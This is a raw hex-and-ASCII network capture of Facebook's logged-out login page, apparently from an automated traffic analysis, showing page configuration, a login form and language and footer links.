                                                                                    2023-02-07 18:46:27 UTC1430INData Raw: 22 70 72 22 3a 31 2c 22 68 61 73 74 65 5f 73 69 74 65 22 3a 22 77 77 77 22 2c 22 6d 61 6e 69 66 65 73 74 5f 62 61 73 65 5f 75 72 69 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 22 2c 22 6d 61 6e 69 66 65 73 74 5f 6f 72 69 67 69 6e 22 3a 6e 75 6c 6c 2c 22 6d 61 6e 69 66 65 73 74 5f 76 65 72 73 69 6f 6e 5f 70 72 65 66 69 78 22 3a 6e 75 6c 6c 2c 22 62 65 5f 6f 6e 65 5f 61 68 65 61 64 22 3a 66 61 6c 73 65 2c 22 69 73 5f 72 74 6c 22 3a 66 61 6c 73 65 2c 22 69 73 5f 63 6f 6d 65 74 22 3a 66 61 6c 73 65 2c 22 69 73 5f 65 78 70 65 72 69 6d 65 6e 74 61 6c 5f 74 69 65 72 22 3a 66 61 6c 73 65 2c 22 69 73 5f 6a 69 74 5f 77 61 72 6d 65 64 5f 75 70 22 3a 74 72 75 65 2c 22 68 73 69 22 3a 22 37 31 39 37 34 38 37 32 34 31
                                                                                    Data Ascii: "pr":1,"haste_site":"www","manifest_base_uri":"https:\/\/static.xx.fbcdn.net","manifest_origin":null,"manifest_version_prefix":null,"be_one_ahead":false,"is_rtl":false,"is_comet":false,"is_experimental_tier":false,"is_jit_warmed_up":true,"hsi":"7197487241
                                                                                    2023-02-07 18:46:27 UTC1431INData Raw: 4c 4f 47 5f 41 53 53 49 47 4e 45 44 5f 55 53 45 52 53 5f 4e 45 57 5f 41 50 49 22 2c 22 42 55 53 49 4e 45 53 53 5f 47 52 41 50 48 5f 53 45 54 54 49 4e 47 5f 53 45 53 47 5f 41 53 53 49 47 4e 45 44 5f 55 53 45 52 53 5f 4e 45 57 5f 41 50 49 22 2c 22 42 55 53 49 4e 45 53 53 5f 47 52 41 50 48 5f 53 45 54 54 49 4e 47 5f 57 41 42 41 5f 41 53 53 49 47 4e 45 44 5f 55 53 45 52 53 5f 4e 45 57 5f 41 50 49 22 2c 22 41 44 53 5f 50 4c 41 43 45 4d 45 4e 54 5f 46 49 58 5f 50 55 42 4c 49 53 48 45 52 5f 50 4c 41 54 46 4f 52 4d 53 5f 4d 55 54 41 54 49 4f 4e 22 2c 22 46 4f 52 43 45 5f 46 45 54 43 48 5f 42 4f 4f 53 54 45 44 5f 43 4f 4d 50 4f 4e 45 4e 54 5f 41 46 54 45 52 5f 41 44 53 5f 43 52 45 41 54 49 4f 4e 22 2c 22 56 49 44 45 4f 5f 44 49 4d 45 4e 53 49 4f 4e 53 5f 46 52 4f
                                                                                    Data Ascii: LOG_ASSIGNED_USERS_NEW_API","BUSINESS_GRAPH_SETTING_SESG_ASSIGNED_USERS_NEW_API","BUSINESS_GRAPH_SETTING_WABA_ASSIGNED_USERS_NEW_API","ADS_PLACEMENT_FIX_PUBLISHER_PLATFORMS_MUTATION","FORCE_FETCH_BOOSTED_COMPONENT_AFTER_ADS_CREATION","VIDEO_DIMENSIONS_FRO
                                                                                    2023-02-07 18:46:27 UTC1432INData Raw: 53 74 6f 72 65 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 65 78 70 61 6e 64 6f 4b 65 79 22 3a 22 5f 5f 46 42 5f 53 54 4f 52 45 22 2c 22 75 73 65 45 78 70 61 6e 64 6f 22 3a 74 72 75 65 7d 2c 32 39 31 35 5d 2c 5b 22 43 6f 6f 6b 69 65 43 6f 72 65 4c 6f 67 67 69 6e 67 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 6d 61 78 69 6d 75 6d 49 67 6e 6f 72 61 62 6c 65 53 74 61 6c 6c 4d 73 22 3a 31 36 2e 36 37 2c 22 73 61 6d 70 6c 65 52 61 74 65 22 3a 39 2e 37 65 2d 35 2c 22 73 61 6d 70 6c 65 52 61 74 65 43 6c 61 73 73 69 63 22 3a 31 2e 30 65 2d 31 30 2c 22 73 61 6d 70 6c 65 52 61 74 65 46 61 73 74 53 74 61 6c 65 22 3a 31 2e 30 65 2d 38 7d 2c 33 34 30 31 5d 2c 5b 22 49 6d 6d 65 64 69 61 74 65 49 6d 70 6c 65 6d 65 6e 74 61 74 69 6f 6e 45 78 70 65 72 69 6d 65 6e 74 73 22 2c 5b 5d
                                                                                    Data Ascii: StoreConfig",[],{"expandoKey":"__FB_STORE","useExpando":true},2915],["CookieCoreLoggingConfig",[],{"maximumIgnorableStallMs":16.67,"sampleRate":9.7e-5,"sampleRateClassic":1.0e-10,"sampleRateFastStale":1.0e-8},3401],["ImmediateImplementationExperiments",[]
                                                                                    2023-02-07 18:46:27 UTC1434INData Raw: 2c 5b 5d 2c 7b 22 6c 69 6e 6b 5f 69 6d 61 67 65 73 5f 74 6f 5f 70 61 67 65 6c 65 74 73 22 3a 66 61 6c 73 65 2c 22 65 6e 61 62 6c 65 5f 62 69 67 70 69 70 65 5f 70 6c 75 67 69 6e 73 22 3a 66 61 6c 73 65 7d 2c 39 30 37 5d 2c 5b 22 49 6e 74 6c 56 61 72 69 61 74 69 6f 6e 48 6f 6c 64 6f 75 74 22 2c 5b 5d 2c 7b 22 64 69 73 61 62 6c 65 5f 76 61 72 69 61 74 69 6f 6e 22 3a 66 61 6c 73 65 7d 2c 36 35 33 33 5d 2c 5b 22 41 73 79 6e 63 52 65 71 75 65 73 74 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 72 65 74 72 79 4f 6e 4e 65 74 77 6f 72 6b 45 72 72 6f 72 22 3a 22 31 22 2c 22 75 73 65 46 65 74 63 68 53 74 72 65 61 6d 41 6a 61 78 50 69 70 65 54 72 61 6e 73 70 6f 72 74 22 3a 66 61 6c 73 65 7d 2c 33 32 38 5d 2c 5b 22 46 62 74 51 54 4f 76 65 72 72 69 64 65 73 22 2c 5b 5d 2c 7b
                                                                                    Data Ascii: ,[],{"link_images_to_pagelets":false,"enable_bigpipe_plugins":false},907],["IntlVariationHoldout",[],{"disable_variation":false},6533],["AsyncRequestConfig",[],{"retryOnNetworkError":"1","useFetchStreamAjaxPipeTransport":false},328],["FbtQTOverrides",[],{
                                                                                    2023-02-07 18:46:27 UTC1435INData Raw: 64 69 61 6c 6f 67 5c 2f 4d 50 6c 61 74 66 6f 72 6d 41 70 70 49 6e 76 69 74 65 73 4a 53 44 69 61 6c 6f 67 5c 2f 22 3a 30 2c 22 5c 2f 63 6f 6e 6e 65 63 74 5c 2f 6a 73 64 69 61 6c 6f 67 5c 2f 4d 50 6c 61 74 66 6f 72 6d 4f 41 75 74 68 53 68 69 6d 4a 53 44 69 61 6c 6f 67 5c 2f 22 3a 30 2c 22 5c 2f 63 6f 6e 6e 65 63 74 5c 2f 6a 73 64 69 61 6c 6f 67 5c 2f 4d 50 6c 61 74 66 6f 72 6d 4c 69 6b 65 4a 53 44 69 61 6c 6f 67 5c 2f 22 3a 30 2c 22 5c 2f 71 70 5c 2f 69 6e 74 65 72 73 74 69 74 69 61 6c 5c 2f 22 3a 31 2c 22 5c 2f 71 70 5c 2f 61 63 74 69 6f 6e 5c 2f 72 65 64 69 72 65 63 74 5c 2f 22 3a 31 2c 22 5c 2f 71 70 5c 2f 61 63 74 69 6f 6e 5c 2f 63 6c 6f 73 65 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 73 75 70 70 6f 72 74 5c 2f 69 6e 65 6c 69 67 69 62 6c 65 5c 2f 22
                                                                                    Data Ascii: dialog\/MPlatformAppInvitesJSDialog\/":0,"\/connect\/jsdialog\/MPlatformOAuthShimJSDialog\/":0,"\/connect\/jsdialog\/MPlatformLikeJSDialog\/":0,"\/qp\/interstitial\/":1,"\/qp\/action\/redirect\/":1,"\/qp\/action\/close\/":1,"\/zero\/support\/ineligible\/"
                                                                                    2023-02-07 18:46:27 UTC1437INData Raw: 65 72 6d 73 5c 2f 22 3a 31 2c 22 5c 2f 6c 6f 67 69 6e 2e 70 68 70 22 3a 31 2c 22 5c 2f 6c 6f 67 69 6e 5c 2f 22 3a 31 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 61 63 63 6f 75 6e 74 5c 2f 22 3a 31 2c 22 5c 2f 6e 5c 2f 22 3a 31 2c 22 5c 2f 72 65 6d 6f 74 65 5f 74 65 73 74 5f 64 65 76 69 63 65 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 62 75 79 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 62 75 79 63 6f 6e 66 69 72 6d 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 62 75 79 72 65 73 75 6c 74 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 70 72 6f 6d 6f 73 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 63 6f 6e 74 69 6e 75 65 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 68 5c 2f 70 72 6f 6d 6f 73 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65
                                                                                    Data Ascii: erms\/":1,"\/login.php":1,"\/login\/":1,"\/mobile\/account\/":1,"\/n\/":1,"\/remote_test_device\/":1,"\/upsell\/buy\/":1,"\/upsell\/buyconfirm\/":1,"\/upsell\/buyresult\/":1,"\/upsell\/promos\/":1,"\/upsell\/continue\/":1,"\/upsell\/h\/promos\/":1,"\/upse
                                                                                    2023-02-07 18:46:27 UTC1438INData Raw: 20 7d 22 7d 2c 33 34 30 35 5d 2c 5b 22 53 65 72 76 65 72 54 69 6d 65 44 61 74 61 22 2c 5b 5d 2c 7b 22 73 65 72 76 65 72 54 69 6d 65 22 3a 31 36 37 35 37 39 35 35 38 37 36 34 33 2c 22 74 69 6d 65 4f 66 52 65 71 75 65 73 74 53 74 61 72 74 22 3a 31 36 37 35 37 39 35 35 38 37 36 32 33 2e 31 2c 22 74 69 6d 65 4f 66 52 65 73 70 6f 6e 73 65 53 74 61 72 74 22 3a 31 36 37 35 37 39 35 35 38 37 36 32 33 2e 31 7d 2c 35 39 34 33 5d 2c 5b 22 41 6e 61 6c 79 74 69 63 73 43 6f 72 65 44 61 74 61 22 2c 5b 5d 2c 7b 22 64 65 76 69 63 65 5f 69 64 22 3a 22 24 5e 7c 41 63 62 45 76 66 37 50 64 33 37 35 73 7a 75 42 64 35 50 5a 61 6f 58 59 4a 78 6b 4c 56 61 79 64 6b 4c 41 62 33 6a 72 76 5f 63 57 68 37 6c 6d 64 6d 47 72 58 67 53 39 6a 34 38 73 41 6f 5f 76 44 71 6c 75 41 31 76 6a 46
                                                                                    Data Ascii: }"},3405],["ServerTimeData",[],{"serverTime":1675795587643,"timeOfRequestStart":1675795587623.1,"timeOfResponseStart":1675795587623.1},5943],["AnalyticsCoreData",[],{"device_id":"$^|AcbEvf7Pd375szuBd5PZaoXYJxkLVaydkLAb3jrv_cWh7lmdmGrXgS9j48sAo_vDqluA1vjF
                                                                                    2023-02-07 18:46:27 UTC1440INData Raw: 31 5d 2c 5b 22 63 72 3a 38 30 37 30 34 32 22 2c 5b 22 73 65 74 54 69 6d 65 6f 75 74 42 6c 75 65 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 73 65 74 54 69 6d 65 6f 75 74 42 6c 75 65 22 2c 22 41 61 33 46 79 79 7a 64 46 6f 72 4d 38 36 5a 37 68 37 4e 67 61 35 76 6e 48 36 39 5f 44 57 51 64 6b 2d 38 51 61 4f 70 72 32 62 6e 79 56 38 46 63 41 41 46 32 4a 4d 41 33 62 45 4f 4d 5f 2d 34 2d 79 71 52 6f 54 65 78 67 4b 78 7a 79 62 49 79 59 41 46 32 39 4e 64 31 6b 74 66 34 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 38 39 36 34 36 32 22 2c 5b 22 73 65 74 49 6e 74 65 72 76 61 6c 41 63 72 6f 73 73 54 72 61 6e 73 69 74 69 6f 6e 73 42 6c 75 65 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 73 65 74 49 6e 74 65 72 76 61 6c 41 63 72 6f 73 73 54 72 61 6e 73 69 74 69 6f 6e 73 42 6c 75 65 22 2c
                                                                                    Data Ascii: 1],["cr:807042",["setTimeoutBlue"],{"__rc":["setTimeoutBlue","Aa3FyyzdForM86Z7h7Nga5vnH69_DWQdk-8QaOpr2bnyV8FcAAF2JMA3bEOM_-4-yqRoTexgKxzybIyYAF29Nd1ktf4"]},-1],["cr:896462",["setIntervalAcrossTransitionsBlue"],{"__rc":["setIntervalAcrossTransitionsBlue",
                                                                                    2023-02-07 18:46:27 UTC1441INData Raw: 6e 67 65 22 3a 30 2c 22 74 69 6d 65 75 70 64 61 74 65 22 3a 30 2c 22 61 64 61 70 74 61 74 69 6f 6e 22 3a 30 2c 22 66 6f 63 75 73 22 3a 30 2c 22 62 6c 75 72 22 3a 30 2c 22 6c 6f 61 64 22 3a 30 2c 22 65 72 72 6f 72 22 3a 30 2c 22 6d 65 73 73 61 67 65 22 3a 30 2c 22 61 62 6f 72 74 22 3a 30 2c 22 73 74 6f 72 61 67 65 22 3a 30 2c 22 73 63 72 6f 6c 6c 22 3a 32 30 30 30 30 30 2c 22 6d 6f 75 73 65 6d 6f 76 65 22 3a 32 30 30 30 30 2c 22 6d 6f 75 73 65 6f 76 65 72 22 3a 31 30 30 30 30 2c 22 6d 6f 75 73 65 6f 75 74 22 3a 31 30 30 30 30 2c 22 6d 6f 75 73 65 77 68 65 65 6c 22 3a 31 2c 22 4d 53 50 6f 69 6e 74 65 72 4d 6f 76 65 22 3a 31 30 30 30 30 2c 22 6b 65 79 64 6f 77 6e 22 3a 30 2e 31 2c 22 63 6c 69 63 6b 22 3a 30 2e 30 32 2c 22 6d 6f 75 73 65 75 70 22 3a 30 2e 30
                                                                                    Data Ascii: nge":0,"timeupdate":0,"adaptation":0,"focus":0,"blur":0,"load":0,"error":0,"message":0,"abort":0,"storage":0,"scroll":200000,"mousemove":20000,"mouseover":10000,"mouseout":10000,"mousewheel":1,"MSPointerMove":10000,"keydown":0.1,"click":0.02,"mouseup":0.0
                                                                                    2023-02-07 18:46:27 UTC1443INData Raw: 75 61 6c 43 6f 6d 70 6c 65 74 69 6f 6e 47 61 74 69 6e 67 22 2c 22 46 62 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 5d 2c 22 63 73 73 22 5d 5d 5d 7d 29 3b 7d 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 66 62 78 20 55 49 50 61 67 65 5f 4c 6f 67 67 65 64 4f 75 74 20 68 61 73 42 61 6e 6e 65 72 20 5f 2d 6b 62 20 5f 36 30 35 61 20 62 5f 63 33 70 79 6e 2d 61 68 68 20 20 77 65 62 6b 69 74 20 77 69 6e 20 78 31 20 4c 6f 63 61 6c 65 5f 65 6e 5f 55 53 22 20 64 69 72 3d 22 6c 74 72 22 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6e 6f 6e 63 65 3d 22 30 55 6a 45 63 4b 36 64 22 3e 72 65 71 75 69 72 65 4c 61 7a 79 28
                                                                                    Data Ascii: ualCompletionGating","FbtLogging","IntlQtEventFalcoEvent"],"css"]]]});});</script></head><body class="fbx UIPage_LoggedOut hasBanner _-kb _605a b_c3pyn-ahh webkit win x1 Locale_en_US" dir="ltr"><script type="text/javascript" nonce="0UjEcK6d">requireLazy(
                                                                                    2023-02-07 18:46:27 UTC1444INData Raw: 6c 5f 70 61 73 73 22 20 2f 3e 3c 2f 74 64 3e 3c 74 64 3e 3c 6c 61 62 65 6c 20 63 6c 61 73 73 3d 22 6c 6f 67 69 6e 5f 66 6f 72 6d 5f 6c 6f 67 69 6e 5f 62 75 74 74 6f 6e 20 75 69 42 75 74 74 6f 6e 20 75 69 42 75 74 74 6f 6e 43 6f 6e 66 69 72 6d 22 20 69 64 3d 22 6c 6f 67 69 6e 62 75 74 74 6f 6e 22 20 66 6f 72 3d 22 75 5f 30 5f 30 5f 63 6c 22 3e 3c 69 6e 70 75 74 20 76 61 6c 75 65 3d 22 4c 6f 67 20 49 6e 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 4c 6f 67 20 69 6e 22 20 64 61 74 61 2d 74 65 73 74 69 64 3d 22 72 6f 79 61 6c 5f 6c 6f 67 69 6e 5f 62 75 74 74 6f 6e 22 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 69 64 3d 22 75 5f 30 5f 30 5f 63 6c 22 20 2f 3e 3c 2f 6c 61 62 65 6c 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 74 72 3e 3c 74 64 20 63 6c 61 73 73 3d 22 6c 6f
                                                                                    Data Ascii: l_pass" /></td><td><label class="login_form_login_button uiButton uiButtonConfirm" id="loginbutton" for="u_0_0_cl"><input value="Log In" aria-label="Log in" data-testid="royal_login_button" type="submit" id="u_0_0_cl" /></label></td></tr><tr><td class="lo
                                                                                    2023-02-07 18:46:27 UTC1446INData Raw: 63 6c 61 73 73 3d 22 73 69 67 6e 75 70 42 61 6e 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 67 6e 75 70 5f 62 61 72 5f 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 67 6e 75 70 5f 62 6f 78 20 63 6c 65 61 72 66 69 78 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 69 67 6e 75 70 5f 62 6f 78 5f 63 6f 6e 74 65 6e 74 22 3e 3c 61 20 72 6f 6c 65 3d 22 62 75 74 74 6f 6e 22 20 63 6c 61 73 73 3d 22 5f 34 32 66 74 20 5f 34 6a 79 30 20 73 69 67 6e 75 70 5f 62 74 6e 20 5f 34 6a 79 34 20 5f 34 6a 79 32 20 73 65 6c 65 63 74 65 64 20 5f 35 31 73 79 22 20 68 72 65 66 3d 22 2f 72 2e 70 68 70 3f 6c 6f 63 61 6c 65 3d 65 6e 5f 55 53 22 3e 43 72 65 61 74 65 20 6e 65 77 20 61 63 63 6f 75 6e 74 3c 2f 61 3e 3c 2f 73 70 61 6e 3e 3c 2f 64
                                                                                    Data Ascii: class="signupBanner"><div class="signup_bar_container"><div class="signup_box clearfix"><span class="signup_box_content"><a role="button" class="_42ft _4jy0 signup_btn _4jy4 _4jy2 selected _51sy" href="/r.php?locale=en_US">Create new account</a></span></d
                                                                                    2023-02-07 18:46:27 UTC1447INData Raw: 20 5f 36 2d 68 20 5f 36 2d 6a 20 5f 36 2d 69 22 20 64 61 74 61 2d 6e 6f 63 6f 6f 6b 69 65 73 3d 22 31 22 3e 3c 6c 69 3e 45 6e 67 6c 69 73 68 20 28 55 53 29 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 73 76 34 22 20 64 69 72 3d 22 6c 74 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 2d 64 65 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75
                                                                                    Data Ascii: _6-h _6-j _6-i" data-nocookies="1"><li>English (US)</li><li><a class="_sv4" dir="ltr" href="https://de-de.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&qu
                                                                                    2023-02-07 18:46:27 UTC1449INData Raw: 74 5f 73 65 74 74 69 6e 67 73 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 26 71 75 6f 74 3b 2c 20 32 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 74 69 74 6c 65 3d 22 49 74 61 6c 69 61 6e 22 3e 49 74 61 6c 69 61 6e 6f 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 73 76 34 22 20 64 69 72 3d 22 6c 74 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 74 2d 70 74 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f
                                                                                    Data Ascii: t_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 2); return false;" title="Italian">Italiano</a></li><li><a class="_sv4" dir="ltr" href="https://pt-pt.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Facco
                                                                                    2023-02-07 18:46:27 UTC1450INData Raw: 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 75 30 30 32 35 32 46 61 64 73 5c 75 30 30 32 35 32 46 6d 61 6e 61 67 65 72 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 26 71 75 6f 74 3b 2c 20 35 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 74 69 74 6c 65 3d 22 53 70 61 6e 69 73 68 22 3e 45 73 70 61 c3 b1 6f 6c 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 73 76 34 22 20 64 69 72 3d 22 6c 74 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 72 2d 74 72 2e 66 61 63 65 62
                                                                                    Data Ascii: 253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 5); return false;" title="Spanish">Espaol</a></li><li><a class="_sv4" dir="ltr" href="https://tr-tr.faceb
                                                                                    2023-02-07 18:46:27 UTC1452INData Raw: 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 68 69 2d 69 6e 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 75 30 30 32 35 32 46 61 64 73 5c 75 30 30 32 35 32 46 6d 61 6e 61 67 65 72 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 26 71 75 6f 74 3b 2c 20 38 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 74 69 74 6c 65 3d 22 48 69 6e 64 69 22 3e e0 a4 b9 e0 a4 bf e0 a4 a8 e0 a5 8d e0 a4 a6 e0 a5 80
                                                                                    Data Ascii: t;https:\/\/hi-in.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 8); return false;" title="Hindi">
                                                                                    2023-02-07 18:46:27 UTC1453INData Raw: 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 65 73 73 65 6e 67 65 72 2e 63 6f 6d 2f 22 20 74 69 74 6c 65 3d 22 43 68 65 63 6b 20 6f 75 74 20 4d 65 73 73 65 6e 67 65 72 2e 22 3e 4d 65 73 73 65 6e 67 65 72 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 6c 69 74 65 2f 22 20 74 69 74 6c 65 3d 22 46 61 63 65 62 6f 6f 6b 20 4c 69 74 65 20 66 6f 72 20 41 6e 64 72 6f 69 64 2e 22 3e 46 61 63 65 62 6f 6f 6b 20 4c 69 74 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 77 61 74 63 68 2f 22 20 74 69 74 6c 65 3d 22 42 72 6f 77 73 65 20 6f 75 72 20 57 61 74 63 68 20 76 69 64 65 6f 73 2e 22 3e 57 61 74 63 68 3c 2f 61 3e 3c 2f 6c 69 3e 3c
                                                                                    Data Ascii: li><a href="https://messenger.com/" title="Check out Messenger.">Messenger</a></li><li><a href="/lite/" title="Facebook Lite for Android.">Facebook Lite</a></li><li><a href="https://www.facebook.com/watch/" title="Browse our Watch videos.">Watch</a></li><
                                                                                    2023-02-07 18:46:27 UTC1454INData Raw: 22 20 74 69 74 6c 65 3d 22 53 65 65 20 74 68 65 20 56 6f 74 69 6e 67 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 43 65 6e 74 65 72 2e 22 3e 56 6f 74 69 6e 67 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 43 65 6e 74 65 72 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 70 72 69 76 61 63 79 2f 70 6f 6c 69 63 79 2f 3f 65 6e 74 72 79 5f 70 6f 69 6e 74 3d 66 61 63 65 62 6f 6f 6b 5f 70 61 67 65 5f 66 6f 6f 74 65 72 22 20 74 69 74 6c 65 3d 22 4c 65 61 72 6e 20 68 6f 77 20 77 65 20 63 6f 6c 6c 65 63 74 2c 20 75 73 65 20 61 6e 64 20 73 68 61 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 74 6f 20 73 75 70 70 6f 72 74 20 46 61 63 65 62 6f 6f 6b 2e 22 3e 50 72 69 76 61 63 79 20 50 6f 6c 69 63 79 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d
                                                                                    Data Ascii: " title="See the Voting Information Center.">Voting Information Center</a></li><li><a href="/privacy/policy/?entry_point=facebook_page_footer" title="Learn how we collect, use and share information to support Facebook.">Privacy Policy</a></li><li><a href=
                                                                                    2023-02-07 18:46:27 UTC1456INData Raw: 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 68 65 6c 70 2f 3f 72 65 66 3d 70 66 22 20 61 63 63 65 73 73 6b 65 79 3d 22 30 22 20 74 69 74 6c 65 3d 22 56 69 73 69 74 20 6f 75 72 20 48 65 6c 70 20 43 65 6e 74 65 72 2e 22 3e 48 65 6c 70 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 65 6c 70 2f 36 33 37 32 30 35 30 32 30 38 37 38 35 30 34 22 20 74 69 74 6c 65 3d 22 56 69 73 69 74 20 6f 75 72 20 43 6f 6e 74 61 63 74 20 55 70 6c 6f 61 64 69 6e 67 20 26 61 6d 70 3b 20 4e 6f 6e 2d 55 73 65 72 73 20 4e 6f 74 69 63 65 2e 22 3e 43 6f 6e 74 61 63 74 20 55 70 6c 6f 61 64 69 6e 67 20 26 61 6d 70 3b 20 4e 6f 6e 2d 55 73 65 72 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 61 63 63 65 73 73 6b 65 79 3d 22 36 22 20 63 6c 61
                                                                                    Data Ascii: /a></li><li><a href="/help/?ref=pf" accesskey="0" title="Visit our Help Center.">Help</a></li><li><a href="help/637205020878504" title="Visit our Contact Uploading &amp; Non-Users Notice.">Contact Uploading &amp; Non-Users</a></li><li><a accesskey="6" cla
